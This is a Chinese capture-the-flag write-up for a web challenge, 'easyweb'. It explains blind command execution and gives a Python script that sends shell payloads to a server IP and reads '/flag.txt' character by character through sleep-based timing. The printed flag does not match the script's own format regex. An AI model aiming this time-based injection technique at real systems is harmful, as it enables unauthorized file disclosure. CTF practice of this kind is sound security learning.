[Web] easyweb - Donek1 xp0int Posted on Sep 6 2020 无回显命令执行,sleep函数验证。尝试发起http请求,dns请求无果。可能服务器不给回连,那就找到flag位置直接爆破。 https://250.ac.cn/2018/12/18/%E6%97%A0%E5%9B%9E%E6%98%BE%E7%9A%84%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E4%B9%8B%E5%88%A9%E7%94%A8/#%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%9C%AA%E8%81%94%E7%BD%91 ``` # -*-coding:utf-8 -*- import requests import re flag_format = re.compile('flag\\{[0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12}\\}') all_letter = '-\{\}0123456789abcdefghijklmnopqrstuvwxyz;' alla = '/-_0123456789abcdefghijklmnopqrstuvwxyz;' lujing = '/' def get_flag(command): try: r = requests.post('http://119.3.37.185/', data={'cmd': command}, timeout=2.5) except: return True return False if __name__ == '__main__': flag = 'flag{' while flag_format.match(flag) == None: staus = 0 for i in all_letter: payload = 'cat /flag.txt | grep %s && sleep 3' % (flag + i) #payload = 'find / -name flag 2>/dev/null | grep %s && sleep 3' % (lujing + i) print(payload) if get_flag(payload): staus = 1 flag += i print(flag) break if staus == 0: flag = flag[0:-1] ``` flag:flag{kijbvstsbsnsj1d9bc8} 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Pwn] babyrpc - cpt.shao [Crypto] confused_flag - match
没有帐号? 立即注册